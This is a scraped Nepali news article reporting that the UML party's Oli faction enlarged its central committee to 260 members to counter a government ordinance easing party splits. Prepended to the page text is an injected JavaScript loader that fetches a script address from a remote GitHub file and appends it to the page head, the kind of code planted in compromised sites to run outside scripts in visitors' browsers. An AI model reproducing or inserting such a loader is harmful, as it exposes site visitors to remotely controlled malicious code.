;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सरकारले ल्याएको दल विभाजनका प्रावधान सफल हुन नदिन एमालेले रणनीति बनाउदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सरकारले ल्याएको दल विभाजनका प्रावधान सफल हुन नदिन एमालेले रणनीति बनाउदै
Breaking News

सरकारले ल्याएको दल विभाजनका प्रावधान सफल हुन नदिन एमालेले रणनीति बनाउदै

जुनेली न्यूज, काठमाण्डौ | नेकपा एमालेको संस्थापन पक्षले सरकारले दल विभाजनका लागि सजिलो प्रावधान राख्दै अध्यादेश ल्याउने भएपछि त्यसलाई सफल हुन नदिन रणनीति बनाउन थालेको छ । सरकारले अध्यादेश सिफारिस गरेपछि एमालेले केन्द्रीय कमिटी सदस्यको संख्या बढाउने निर्णय गरेको हो ।

मंगलबार पार्टी निर्णयको आधिकारिक निर्णय भन्दै अध्यक्ष केपी ओली पक्षले २६० जना केन्द्रीय सदस्यको नाम निर्वाचन आयोगलाई बुझाएको हो । एमाले नेता तथा निर्वाचन समितिका संयोजक अग्नि खरेलसहितको टोली मंगलबार निर्वाचन आयोग पुगेर केन्द्रीय कमिटीको विवरण अद्यावधिक गर्न लिखित निवेदन बुझाएको हो ।

अहिलेसम्म २०३ सदस्यीय रहेको केन्द्रीय कमिटीमा ५३ जना थप गरी २६० सदस्यीय बनाइएको व्यहोरा र विवरण निर्वाचन आयोगमा पठाएको हो ।

आयोगले यसलाई मान्यता दिएमा र नयाँ अध्यादेश जारी भएमा नयाँ दल दर्ताका लागि नेपाल समूहसँग ५२ जना केन्द्रिय सदस्यको समर्थन आवश्यक पर्छ ।

 

फेसबुक प्रतिक्रियाहरु